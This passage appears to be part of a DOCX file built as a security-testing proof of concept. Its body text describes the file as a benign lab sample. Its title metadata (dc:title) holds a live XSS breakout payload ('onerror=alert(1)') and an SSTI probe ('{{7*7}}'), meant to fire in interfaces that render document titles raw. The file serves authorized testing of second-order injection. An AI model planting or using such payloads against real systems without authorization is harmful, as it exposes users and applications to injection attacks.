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>Safe PoC -&gt; x8bitranjit (benign lab file).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Benign DOCX metadata PoC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The TITLE metadata carries an inert XSS string and an SSTI probe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Where it fires: document-management UIs, listing panels, chat/link previews that render dc:title raw.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Check File &gt; Info in Word to see the title. Authorized testing only.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=docProps/core.xml><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:title>"><img src=x onerror=alert(1)> {{7*7}}</dc:title><dc:creator>x8bitranjit - benign PoC lab</dc:creator><dc:description>Safe PoC -> x8bitranjit</dc:description><cp:keywords>safe-poc, second-order, metadata, SSTI-probe</cp:keywords></cp:coreProperties>
</file>